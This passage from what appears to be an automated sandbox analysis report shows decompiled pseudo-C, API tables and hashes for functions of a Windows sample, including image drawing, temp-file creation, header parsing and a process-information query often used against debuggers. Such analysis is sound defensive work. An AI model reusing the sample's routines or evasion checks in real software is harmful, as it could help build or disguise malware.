				_t209 = (0x2fa0be83 * _t76 / _t25 *  *0x462740 >> 0x20 >> 3 >> 0x1f) + (0x2fa0be83 * _t76 / _t25 *  *0x462740 >> 0x20 >> 3) - ((0x92492493 * _t213 >> 0x20) + _t213 >> 2 >> 0x1f) + ((0x92492493 * _t213 >> 0x20) + _t213 >> 2) - ( *0x460334 & 0x0000ffff) + (_t120 & 0x000000ff);
				 *0x462740 = _t209;
				if(( *0x462f64 & 0x000000ff) - ((0x8d3dcb09 * _t214 >> 0x20) + _t214 >> 4 >> 0x1f) + ((0x8d3dcb09 * _t214 >> 0x20) + _t214 >> 4) - ( *0x4631d8 & 0x000000ff) == _t120) {
					_t209 = _t209 -  *0x462f60;
					 *0x462740 = _t209;
				}
				_t179 =  *0x463204; // 0x4
				_t121 =  *0x463200; // 0x211
				_t200 =  *0x4631f8; // 0x2a8
				 *0x462b44 = (0x66666667 *  *0x462f8c >> 0x20 >> 2 >> 0x1f) + (0x66666667 *  *0x462f8c >> 0x20 >> 2) +  *0x462b44 + _t197 * _t121 - _t179 *  *0x4631d8;
				if(_t200 != _t209) {
					_t211 =  *0x4631e8; // 0x789
					asm("cdq");
					_t209 = _t211 + 0x63;
					 *0x462b40 = (_t214 / (_t211 + 0x63) + 1) * _t139;
				}
				if( *0x462f60 != 0) {
					_t140 =  *0x460334; // 0xc30c4
					_t209 = ( *0x4631f0 & 0x000000ff) * _v164;
					 *0x460334 = _t140 + ((0x49f49f49 * _t140 >> 0x20) - _t140 >> 5 >> 0x1f) + ((0x49f49f49 * _t140 >> 0x20) - _t140 >> 5) - ( *0x4631f0 & 0x000000ff) * _v164 + _t200;
				} else {
					_t151 =  *0x4631f0; // 0x3b8402f
					 *0x4631f4 = _t151;
				}
				_t142 =  *0x462f64; // 0x0
				 *0x4631f8 = ((0xb60b60b7 * _t142 >> 0x20) + _t142 >> 5 >> 0x1f) + ((0xb60b60b7 * _t142 >> 0x20) + _t142 >> 5) - _t200 +  *0x462f8c + _t121;
				return E004230EF(0, _t121, _v60 ^ _t216, (0xb60b60b7 * _t142 >> 0x20) + _t142 >> 5, _t200, _t209);
			}

0x00408870
0x00408873
0x0040887a
0x00408884
0x00408898
0x00408898
0x004088a1
0x004088a3
0x004088bd
0x004088c3
0x004088de
0x004088e7
0x004088e9
0x004088f3
0x004088f3
0x004088f5
0x004088ff
0x00408901
0x0040890b
0x0040890d
0x00408913
0x0040891a
0x0040892f
0x00408935
0x00408949
0x0040894d
0x00408963
0x00408968
0x0040896e
0x00408974
0x00408978
0x00408979
0x00408982
0x00408982
0x00408987
0x0040898d
0x00408995
0x0040899a
0x004089a5
0x004089ab
0x004089d4
0x004089f2
0x00408a19
0x00408a21
0x00408a23
0x00408a29
0x00408a29
0x00408a2f
0x00408a3c
0x00408a64
0x00408a6e
0x00408a73
0x00408a75
0x00408a7d
0x00408a7e
0x00408a87
0x00408a87
0x00408a93
0x00408aa3
0x00408ab0
0x00408ace
0x00408a95
0x00408a95
0x00408a9b
0x00408a9b
0x00408ad4
0x00408af9
0x00408b11

APIs

CoInitialize.OLE32(00000000), ref: 00408884
CreateBindCtx.OLE32(00000000,?), ref: 004088A3
MkParseDisplayName.OLE32(?,?,?,?), ref: 004088BD

Strings

(F, xrefs: 00408920
clsid:10000002-0000-0000-0000-000000000001, xrefs: 0040888F
gfff, xrefs: 00408A47

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: BindCreateDisplayInitializeNameParse
String ID: (F$clsid:10000002-0000-0000-0000-000000000001$gfff
API String ID: 1704702878-912546861
Opcode ID: df77ca69d8a51d5ab00b8da832f4f21574909adbc8a31b4ef1f1fcb6776cbfaf
Instruction ID: c8e21cb024f50e6d37563fd4640637af34df1042737a28a59c03a06e4bf3defc
Opcode Fuzzy Hash: df77ca69d8a51d5ab00b8da832f4f21574909adbc8a31b4ef1f1fcb6776cbfaf
Instruction Fuzzy Hash: B571A2717006559FC70CCF28EE91665B7A6F7C9301B09813EE9458B3B4E7B4B904DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 04773914 Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 04773945

Memory Dump Source

Source File: 00000000.00000002.291429509.0000000004773000.00000040.00001000.00020000.00000000.sdmp, Offset: 04773000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4773000_555.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 7787d9993b5a26713a119b34747f1c649e16aec8ba4d31346281d7437f2ff471
Instruction ID: cbbb75438fcad5ed3457a77a047c7aa92946a6275a0315f9cf2b780783930588
Opcode Fuzzy Hash: 7787d9993b5a26713a119b34747f1c649e16aec8ba4d31346281d7437f2ff471
Instruction Fuzzy Hash: A4F074B5A0020DAF8B44DF98D8809AEBBF9FF4C200F108599FD1993311D630AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE10 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 397
windowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0040CE10(void* __ebp, void* __fp0, int _a4, int _a8, int _a12, long _a16) {
				intOrPtr _v4;
				void* _v12;
				signed int _v16;
				char _v36;
				char _v276;
				char _v284;
				char _v548;
				char _v808;
				char _v816;
				struct tagPAINTSTRUCT _v860;
				struct tagRECT _v876;
				void* _v892;
				struct HDC__* _v896;
				intOrPtr _v900;
				struct HDC__* _v904;
				struct HWND__* _v908;
				struct HDC__* _v912;
				struct HDC__* _v924;
				void* _v928;
				struct HDC__* _v932;
				struct HDC__* _v936;
				struct HDC__* _v944;
				struct HDC__* _v948;
				int _v988;
				struct HDC__* _v996;
				struct HDC__* _v1012;
				int _v1052;
				int _v1060;
				char _v1075;
				char _v1076;
				int _v1124;
				struct tagPAINTSTRUCT _v1140;
				intOrPtr _v1176;
				struct HDC__* _v1180;
				struct HWND__* _v1188;
				struct HDC__* _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t82;
				signed int _t84;
				int _t87;
				long _t88;
				struct HDC__* _t90;
				struct HDC__* _t92;
				CHAR* _t102;
				CHAR* _t108;
				struct HDC__* _t110;
				struct HDC__* _t111;
				struct HDC__* _t112;
				void* _t113;
				struct HDC__* _t114;
				int _t115;
				struct HDC__* _t116;
				struct HWND__* _t124;
				struct HDC__* _t130;
				intOrPtr _t131;
				void* _t133;
				void* _t135;
				struct HWND__* _t136;
				struct HDC__* _t143;
				intOrPtr _t146;
				void* _t152;
				struct HDC__* _t156;
				intOrPtr _t162;
				int _t168;
				struct HDC__* _t175;
				void* _t179;
				void* _t180;
				struct HDC__* _t181;
				struct HDC__* _t182;
				struct HDC__* _t183;
				struct HWND__* _t185;
				void* _t186;
				intOrPtr* _t187;
				struct HDC__* _t188;
				struct HWND__* _t189;
				struct HDC__* _t192;
				void* _t193;
				signed int _t194;
				void* _t196;
				void* _t198;
				signed long long _t205;

				_push(0xffffffff);
				_push(E0044E400);
				_push( *[fs:0x0]);
				_t194 = _t193 - 0x388;
				_t82 =  *0x4608e0; // 0xb51ec2b3
				_v16 = _t82 ^ _t194;
				_push(__ebp);
				_push(_t179);
				_t84 =  *0x4608e0; // 0xb51ec2b3
				_push(_t84 ^ _t194);
				 *[fs:0x0] =  &_v12;
				_t87 = _a8;
				_t185 = _a4;
				_t169 = _a12;
				_v908 = _t185;
				_t198 = _t87 - 0xf;
				if(_t198 > 0) {
					__eflags = _t87 - 0x111;
					if(_t87 != 0x111) {
						L51:
						_t88 = DefWindowProcA(_t185, _t87, _t169, _a16); // executed
						L60:
						 *[fs:0x0] = _v12;
						_pop(_t180);
						_pop(_t186);
						_pop(_t133);
						return E004230EF(_t88, _t133, _v16 ^ _t194, _t169, _t180, _t186);
					}
					_t143 = (_t169 & 0x0000ffff) - 0x1b59;
					__eflags = _t143;
					if(_t143 == 0) {
						_t90 = E0040B640(_t185, 0x4632c0, 0x4633c8);
						_t194 = _t194 + 0xc;
						__eflags = _t90;
						if(__eflags == 0) {
							CommDlgExtendedError();
						} else {
							_push(0xa8);
							_t92 = E00422C34(_t169, _t179, _t185, __eflags);
							_t194 = _t194 + 4;
							_v908 = _t92;
							_v4 = 4;
							__eflags = _t92;
							if(_t92 == 0) {
								_t187 = 0;
								__eflags = 0;
							} else {
								_push(1);
								_push(0x40);
								_push(2);
								_push(0x4632c0);
								_t187 = E0040CBD0(_t92);
							}
							_a4 = 0xffffffff;
							E00405900();
							E0040CA50(_t187, _t179, __eflags);
							_t146 =  *((intOrPtr*)( *_t187 + 4));
							_t169 =  *(_t146 + _t187);
							 *((intOrPtr*)( *( *(_t146 + _t187))))(0, _t187);
						}
						L59:
						_t88 = 0;
						goto L60;
					}
					__eflags = _t143 == 1;
					if(_t143 == 1) {
						SendMessageA(_t185, 0x10, 0, 0);
						goto L59;
					}
					goto L51;
				}
				if(_t198 == 0) {
					_t181 = BeginPaint(_t185,  &_v860);
					GetClientRect(_t185,  &_v876);
					__eflags =  *0x460368 - 0x10;
					_t102 =  *0x460354; // 0x2231290
					if( *0x460368 < 0x10) {
						_t102 = 0x460354;
					}
					DrawTextA(_t181, _t102, 0xffffffff,  &_v876, 0x25);
					_t169 =  &_v860;
					EndPaint(_t185,  &_v860);
					goto L59;
				}
				_t152 = _t87 - 1;
				if(_t152 == 0) {
					_t182 = BeginPaint(_t185,  &_v860);
					GetClientRect(_t185,  &_v876);
					__eflags =  *0x460368 - 0x10;
					_t108 =  *0x460354; // 0x2231290
					if( *0x460368 < 0x10) {
						_t108 = 0x460354;
					}
					DrawTextA(_t182, _t108, 0xffffffff,  &_v876, 0x25); // executed
					_t110 =  &_v892;
					_push(_t110);
					_push("bmp");
					_v896 = 0x451ac4;
					_v892 = 0;
					L00439910(); // executed
					_v896 = _t110;
					_push( &_v924);
					_push(_v900);
					_v12 = 0;
					_v924 = 0;
					L00439928();
					__eflags = _t110;
					if(_t110 != 0) {
						_v904 = _t110;
					}
					_t111 =  &_v928;
					_push(_t111);
					_push(_v908);
					_v928 = 0;
					L0043992E();
					__eflags = _t111;
					if(_t111 != 0) {
						_v912 = _t111;
					}
					_push( &_v904);
					_push(_t182);
					_v904 = 0;
					L00439934();
					_t192 = _v912;
					_v932 = _t111;
					_v936 = _t192;
					_t183 = _v944;
					_t188 = _v948;
					_push(0);
					_t112 = _v924;
					_push(0);
					_push(0);
					_push(2);
					_push(_t183);
					_push(_t188);
					_push(0);
					_push(0);
					_push(_t183);
					_push(_t188);
					_push(0xa);
					_push(0xa);
					_push(_t112);
					_push(_t192);
					_v36 = 1;
					L00439940();
					__eflags = _t112;
					if(_t112 != 0) {
						_v988 = _t112;
					}
					_push(5);
					_push(_t192);
					L0043993A();
					__eflags = _t112;
					if(_t112 != 0) {
						_v996 = _t112;
					}
					_t156 = _t188;
					_v1012 = _t156;
					asm("fild dword [esp+0x14]");
					__eflags = _t156;
					if(_t156 < 0) {
					}
					_t205 =  *0x451b70 * st0;
					asm("fxch st0, st1");
					_t113 = E00423D70(_t112, _t205);
					_t175 = _t183;
					_v1012 = _t175;
					asm("fild dword [esp+0x14]");
					_t135 = _t113;
					__eflags = _t175;
					if(_t175 < 0) {
						_t205 = _t205 +  *0x451b78;
					}
					asm("fmulp st1, st0");
					_t114 = E00423D70(_t113, _t205);
					_push(0);
					_push(0);
					_push(0);
					_push(2);
					_push(_t183);
					_push(_t188);
					_push(0);
					_push(0);
					_push(_t114);
					_push(_t135);
					_push(0xfa);
					_v1012 = _t114;
					_t115 = _v988;
					_push(0xa);
					_push(_t115);
					_push(_t192);
					L00439940();
					__eflags = _t115;
					if(_t115 != 0) {
						_v1052 = _t115;
					}
					_push(6);
					_push(_t192);
					L0043993A();
					__eflags = _t115;
					if(_t115 != 0) {
						_v1060 = _t115;
					}
					_push(0);
					_t169 = _v1052;
					_push(0);
					_push(0);
					_push(2);
					_push(_t183);
					_push(_t188);
					_push(0);
					_push(0);
					_push(_v1076);
					_push(_t135);
					_push(0xfa);
					_push(0x96);
					_push(_v1052);
					_push(_t192);
					L00439940();
					__eflags = _t115;
					if(_t115 != 0) {
						_v1140.fRestore = _t115;
					}
					_push(7);
					_push(_t192);
					L0043993A();
					__eflags = _t115;
					if(_t115 == 0) {
						_v1140.fErase = 0;
					} else {
						_v1124 = _t115;
						_v1140.fErase = _t115;
					}
					_t116 = _v1140.hdc;
					_push(0);
					_push(0);
					_push(0);
					_push(2);
					_push(_t183);
					_push(_t188);
					_push(0);
					_push(0);
					_push(_t116);
					_push(_t135);
					_push(0xfa);
					_push(0x122);
					_push(_v1140.fRestore);
					_push(_t192);
					L00439940();
					__eflags = _t116;
					if(_t116 == 0) {
						_t116 = 0;
						__eflags = 0;
					} else {
						_v1180 = _t116;
					}
					__eflags = _v1192;
					if(_v1192 == 0) {
						__eflags = _t116;
						if(_t116 != 0) {
							_t136 = _v1188;
							EndPaint(_t136,  &_v1140);
							E0040B5C0(_t136);
							_t196 = _t194 + 4;
							__eflags = _t183;
							if(__eflags == 0) {
								_push(0x280c); // executed
								_t130 = E00422C34( &_v1140, _t183, _t188, __eflags); // executed
								_t196 = _t196 + 4;
								_v1188 = _t130;
								_v284 = 2;
								__eflags = _t130;
								if(_t130 == 0) {
									_t131 = 0;
									__eflags = 0;
								} else {
									_t131 = E00407DF0(_t130, _t205);
								}
								_v276 = 1;
								 *0x4634d0 = _t131;
							}
							_v1076 = 0;
							E00422B80( &_v1075, 0, 0x103);
							GetTempPathA(0x104,  &_v1076);
							GetTempFileNameA( &_v1076, 0x4515f5, 0,  &_v816); // executed
							_push(0xa8);
							_t124 = E00422C34( &_v816, _t183, _t188, __eflags);
							_t194 = _t196 + 0x10;
							_v1188 = _t124;
							_v284 = 3;
							__eflags = _t124;
							if(_t124 == 0) {
								_t189 = 0;
								__eflags = 0;
							} else {
								_push(1);
								_push(0x40);
								_push(2);
								_push( &_v808);
								_t124 = E0040CBD0(_t124);
								_t189 = _t124;
							}
							_v276 = 1;
							__imp__GetFinalPathNameByHandleA(_t136,  &_v548, 0x104, 2);
							__eflags = _t124;
							if(__eflags == 0) {
								_push(_t189);
								E00405900();
							}
							E0040CA50(_t189, _t183, __eflags);
							_t162 =  *((intOrPtr*)(_t189->i + 4));
							_t169 =  *(_t162 + _t189);
							__eflags = _t162 + _t189;
							 *((intOrPtr*)( *( *(_t162 + _t189))))(0);
						}
					}
					_push(_t192);
					L0043990A();
					_push(_v1176);
					_v1180 = 0x451ac4;
					L00439922();
					goto L59;
				}
				_t168 = _t152 - 1;
				if(_t168 != 0) {
					goto L51;
				} else {
					PostQuitMessage(_t168);
					goto L59;
				}
			}

0x0040ce10
0x0040ce12
0x0040ce1d
0x0040ce1e
0x0040ce24
0x0040ce2b
0x0040ce33
0x0040ce35
0x0040ce36
0x0040ce3d
0x0040ce45
0x0040ce4b
0x0040ce52
0x0040ce59
0x0040ce60
0x0040ce64
0x0040ce67
0x0040d223
0x0040d228
0x0040d238
0x0040d243
0x0040d2e7
0x0040d2ee
0x0040d2f6
0x0040d2f7
0x0040d2f9
0x0040d30e
0x0040d30e
0x0040d22d
0x0040d22d
0x0040d233
0x0040d26b
0x0040d270
0x0040d273
0x0040d275
0x0040d2df
0x0040d277
0x0040d277
0x0040d27c
0x0040d281
0x0040d284
0x0040d288
0x0040d293
0x0040d295
0x0040d2ad
0x0040d2ad
0x0040d297
0x0040d297
0x0040d299
0x0040d29b
0x0040d29d
0x0040d2a9
0x0040d2a9
0x0040d2b6
0x0040d2c1
0x0040d2c8
0x0040d2cf
0x0040d2d2
0x0040d2db
0x0040d2db
0x0040d2e5
0x0040d2e5
0x00000000
0x0040d2e5
0x0040d235
0x0040d236
0x0040d255
0x00000000
0x0040d255
0x00000000
0x0040d236
0x0040ce6d
0x0040d1e0
0x0040d1e8
0x0040d1ee
0x0040d1f5
0x0040d1fa
0x0040d1fc
0x0040d1fc
0x0040d20c
0x0040d212
0x0040d218
0x00000000
0x0040d218
0x0040ce75
0x0040ce76
0x0040ce9d
0x0040ce9f
0x0040cea5
0x0040ceac
0x0040ceb1
0x0040ceb3
0x0040ceb3
0x0040cec3
0x0040cec9
0x0040cecd
0x0040ced0
0x0040ced5
0x0040cedd
0x0040cee1
0x0040cee6
0x0040cef2
0x0040cef3
0x0040cef4
0x0040cefb
0x0040ceff
0x0040cf04
0x0040cf06
0x0040cf08
0x0040cf08
0x0040cf10
0x0040cf14
0x0040cf15
0x0040cf16
0x0040cf1a
0x0040cf1f
0x0040cf21
0x0040cf23
0x0040cf23
0x0040cf2b
0x0040cf2c
0x0040cf2d
0x0040cf31
0x0040cf36
0x0040cf3a
0x0040cf3e
0x0040cf42
0x0040cf46
0x0040cf4a
0x0040cf4b
0x0040cf4f
0x0040cf50
0x0040cf51
0x0040cf53
0x0040cf54
0x0040cf55
0x0040cf56
0x0040cf57
0x0040cf58
0x0040cf59
0x0040cf5b
0x0040cf5d
0x0040cf5e
0x0040cf5f
0x0040cf67
0x0040cf6c
0x0040cf6e
0x0040cf70
0x0040cf70
0x0040cf74
0x0040cf76
0x0040cf77
0x0040cf7c
0x0040cf7e
0x0040cf80
0x0040cf80
0x0040cf84
0x0040cf86
0x0040cf8a
0x0040cf8e
0x0040cf90
0x0040cf90
0x0040cf9e
0x0040cfa0
0x0040cfa2
0x0040cfa7
0x0040cfa9
0x0040cfad
0x0040cfb1
0x0040cfb3
0x0040cfb5
0x0040cfb7
0x0040cfb7
0x0040cfbd
0x0040cfbf
0x0040cfc4
0x0040cfc6
0x0040cfc8
0x0040cfca
0x0040cfcc
0x0040cfcd
0x0040cfce
0x0040cfd0
0x0040cfd2
0x0040cfd3
0x0040cfd4
0x0040cfd9
0x0040cfdd
0x0040cfe1
0x0040cfe3
0x0040cfe4
0x0040cfe5
0x0040cfea
0x0040cfec
0x0040cfee
0x0040cfee
0x0040cff2
0x0040cff4
0x0040cff5
0x0040cffa
0x0040cffc
0x0040cffe
0x0040cffe
0x0040d006
0x0040d008
0x0040d00c
0x0040d00e
0x0040d010
0x0040d012
0x0040d013
0x0040d014
0x0040d016
0x0040d018
0x0040d019
0x0040d01a
0x0040d01f
0x0040d024
0x0040d025
0x0040d026
0x0040d02b
0x0040d02d
0x0040d02f
0x0040d02f
0x0040d033
0x0040d035
0x0040d036
0x0040d03b
0x0040d03d
0x0040d049
0x0040d03f
0x0040d03f
0x0040d043
0x0040d043
0x0040d051
0x0040d055
0x0040d05b
0x0040d05d
0x0040d05f
0x0040d061
0x0040d062
0x0040d063
0x0040d065
0x0040d067
0x0040d068
0x0040d069
0x0040d06e
0x0040d073
0x0040d074
0x0040d075
0x0040d07a
0x0040d07c
0x0040d084
0x0040d084
0x0040d07e
0x0040d07e
0x0040d07e
0x0040d086
0x0040d08b
0x0040d091
0x0040d093
0x0040d099
0x0040d0a3
0x0040d0aa
0x0040d0af
0x0040d0b2
0x0040d0b4
0x0040d0b6
0x0040d0bb
0x0040d0c0
0x0040d0c3
0x0040d0c7
0x0040d0cf
0x0040d0d1
0x0040d0dc
0x0040d0dc
0x0040d0d3
0x0040d0d5
0x0040d0d5
0x0040d0de
0x0040d0e6
0x0040d0e6
0x0040d0fa
0x0040d102
0x0040d117
0x0040d134
0x0040d13a
0x0040d13f
0x0040d144
0x0040d147
0x0040d14b
0x0040d153
0x0040d155
0x0040d170
0x0040d170
0x0040d157
0x0040d157
0x0040d159
0x0040d15b
0x0040d164
0x0040d167
0x0040d16c
0x0040d16c
0x0040d182
0x0040d18a
0x0040d190
0x0040d192
0x0040d19a
0x0040d19b
0x0040d19b
0x0040d1a2
0x0040d1a9
0x0040d1ac
0x0040d1b1
0x0040d1b5
0x0040d1b5
0x0040d093
0x0040d1b7
0x0040d1b8
0x0040d1c1
0x0040d1c2
0x0040d1ca
0x00000000
0x0040d1ca
0x0040ce78
0x0040ce79
0x00000000
0x0040ce7f
0x0040ce80
0x00000000
0x0040ce80

APIs

PostQuitMessage.USER32(?), ref: 0040CE80
BeginPaint.USER32(?,?,B51EC2B3), ref: 0040CE91
GetClientRect.USER32(?,?), ref: 0040CE9F
DrawTextA.USER32(00000000,02231290,000000FF,?,00000025), ref: 0040CEC3
GdipLoadImageFromFile.GDIPLUS ref: 0040CEE1
GdipGetImageWidth.GDIPLUS(?,?), ref: 0040CEFF
GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 0040CF1A
GdipCreateFromHDC.GDIPLUS(00000000,?,?,?,?,?), ref: 0040CF31
GdipDrawImageRectRectI.GDIPLUS ref: 0040CF67
GdipSetInterpolationMode.GDIPLUS(?,00000005), ref: 0040CF77
BeginPaint.USER32(?,?,B51EC2B3), ref: 0040D1DA
GetClientRect.USER32(?,?), ref: 0040D1E8
DrawTextA.USER32(00000000,02231290,000000FF,?,00000025), ref: 0040D20C
EndPaint.USER32(?,?), ref: 0040D218
DefWindowProcA.USER32(?,?,?,?,B51EC2B3), ref: 0040D243
SendMessageA.USER32 ref: 0040D255

Strings

bmp, xrefs: 0040CED0

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Gdip$ImageRect$DrawPaint$BeginClientFromMessageText$CreateFileHeightInterpolationLoadModePostProcQuitSendWidthWindow
String ID: bmp
API String ID: 2880020105-876913290
Opcode ID: e2114263b03dc324f4fcf13a725f5bc36b83f1ce00521651d7bff18489638fbd
Instruction ID: 3198e77dc074dcb38b8e0eacb58769871f481351e99ffb9ca330cc1e63303d58
Opcode Fuzzy Hash: e2114263b03dc324f4fcf13a725f5bc36b83f1ce00521651d7bff18489638fbd
Instruction Fuzzy Hash: 94D17370604341AFE320DF61CC45F6B77E8EB89709F10492EF685A62D1D7B8D9058B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00414C60 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00414C60(intOrPtr __ecx, void* __edi, char _a4) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				char _v80;
				char _v108;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				void* __esi;
				intOrPtr _t247;
				intOrPtr _t249;
				void* _t250;
				intOrPtr _t258;
				intOrPtr _t268;
				signed char _t270;
				void* _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				void* _t283;
				void* _t301;
				intOrPtr _t337;
				intOrPtr _t340;
				intOrPtr _t360;
				intOrPtr _t372;
				intOrPtr* _t378;
				intOrPtr* _t381;
				intOrPtr _t437;
				signed int _t440;
				signed int _t443;
				intOrPtr _t454;
				intOrPtr _t458;
				intOrPtr _t460;
				void* _t494;
				void* _t495;
				intOrPtr _t500;
				void* _t501;
				void* _t502;
				intOrPtr _t504;
				void* _t506;
				intOrPtr _t508;
				intOrPtr _t510;

				_t494 = __edi;
				_push(0xffffffff);
				_push(E0044EB94);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t500;
				_t501 = _t500 - 0x12c;
				_push(_t495);
				_v252 = __ecx;
				_v48 = 0;
				_v24 = 0;
				_v20 = 0;
				E00417FD0( &_v40);
				_v8 = 0;
				_t247 = _v252;
				 *((intOrPtr*)(_t247 + 0xd8)) = 1;
				 *((intOrPtr*)(_t247 + 0xdc)) = 0;
				_t10 =  &_a4; // 0x414c2c
				_t515 =  *_t10 & 0x000000ff;
				if(( *_t10 & 0x000000ff) == 0) {
					_t249 = E00412C50(__eflags,  &_v108, _v252 + 4); // executed
					_t502 = _t501 + 8;
					_v264 = _t249;
					_v268 = _v264;
					_v8 = 2;
					_t250 = E00417A40(_v268);
					__eflags = _v252 + 0x20;
					E00418480(_v252 + 0x20, _t495, _t250, 0x21, 0x40); // executed
					_v8 = 0;
					E004179F0( &_v108);
				} else {
					_t340 = E00412C50(_t515,  &_v80, _v252 + 4);
					_t502 = _t501 + 8;
					_v256 = _t340;
					_v260 = _v256;
					_v8 = 1;
					E00418480(_v252 + 0x20, _t495, E00417A40(_v260), 0x23, 0x40);
					_v8 = 0;
					E004179F0( &_v80);
				}
				_t454 = _v252;
				if((E00401370(_t454 +  *((intOrPtr*)( *(_v252 + 0x20) + 4)) + 0x20) & 0x000000ff) != 0) {
					E004178F0(_v252 + 0x20, _t494, _t495, __eflags, 0, 0, 2);
					_t258 = E00401EC0(E00417980(_v252 + 0x20, __eflags,  &_v136));
					_t360 = _v252;
					 *((intOrPtr*)(_t360 + 0xe8)) = _t258;
					 *((intOrPtr*)(_t360 + 0xec)) = _t454;
					_push(0x200);
					_v140 = E0040E131(_t454, _t494, _t495, __eflags);
					_v48 = _v140;
					_t504 = _t502 + 4 - 0x18;
					_v144 = _t504;
					E00401C50(_t504, 0, 0);
					E00417840(_v252 + 0x20, _t494, _t495, __eflags);
					E00410560(_v252 + 0x20, __eflags, _v48, 0x200, 0);
					E004153C0(_t494, _t495, __eflags, _v252 + 0x20);
					E00412ED0( *((intOrPtr*)(_v252 + 0xf4)), __eflags, _v48);
					_v148 = _v48;
					_push(_v148);
					E00422D00();
					_t506 = _t504 + 8;
					_t268 = _v252;
					 *((intOrPtr*)(_t268 + 0xd8)) = 2;
					 *((intOrPtr*)(_t268 + 0xdc)) = 0;
					_v52 = 0;
					while(1) {
						__eflags = _v52 - 8;
						if(_v52 >= 8) {
							break;
						}
						_t337 =  *((intOrPtr*)(_v252 + 0xf4));
						_t440 = _v52;
						_t71 = _v52 + 0x4520d0; // 0x68735f62
						__eflags = ( *(_t337 + _t440) & 0x000000ff) - ( *_t71 & 0x000000ff);
						if(( *(_t337 + _t440) & 0x000000ff) == ( *_t71 & 0x000000ff)) {
							_t443 = _v52 + 1;
							__eflags = _t443;
							_v52 = _t443;
							continue;
						} else {
							_v8 = 0xffffffff;
							_t272 = E00417D00( &_v40);
						}
						goto L23;
					}
					_t458 = _v252;
					 *((intOrPtr*)(_t458 + 0xd8)) = 3;
					 *((intOrPtr*)(_t458 + 0xdc)) = 0;
					_t270 = E00412DE0( *((intOrPtr*)(_v252 + 0xf4)));
					__eflags = _t270 & 0x000000ff;
					if((_t270 & 0x000000ff) != 0) {
						_v272 =  *((intOrPtr*)(_v252 + 0xf4));
						_t372 = _v272;
						__eflags =  *((intOrPtr*)(_t372 + 0x28)) - 0x1000;
						if( *((intOrPtr*)(_t372 + 0x28)) != 0x1000) {
							L15:
							_v8 = 0xffffffff;
							_t272 = E00417D00( &_v40);
						} else {
							_t460 = _v272;
							__eflags =  *(_t460 + 0x2c);
							if( *(_t460 + 0x2c) == 0) {
								_t275 = E00427A20(1,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xf4)) + 8)), 0);
								_t378 =  *((intOrPtr*)(_v252 + 0xfc));
								 *_t378 = _t275;
								 *((intOrPtr*)(_t378 + 4)) = 0;
								_t278 = E00427A20(1,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xf4)) + 0x10)), 0);
								_t381 =  *((intOrPtr*)(_v252 + 0x100));
								 *_t381 = _t278;
								 *((intOrPtr*)(_t381 + 4)) = 0;
								_v276 = E00416210(_v252, __eflags,  &_v164, 1);
								_v280 = _v276;
								_v8 = 3;
								E00417BC0( &_v40, _v280);
								_v8 = 0;
								E00417D00( &_v164);
								_t283 = E00417E20( &_v40);
								_t497 =  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)) + 4));
								_v24 = E00423BC0(_t283, 0,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)) + 4)));
								_v20 = 0;
								__eflags = _v20;
								if(__eflags > 0) {
									L18:
									_push(_v24);
									_v168 = E0040E131(_v24, _t494, _t497, __eflags);
									_v48 = _v168;
									_push(_v20);
									_push(_v24);
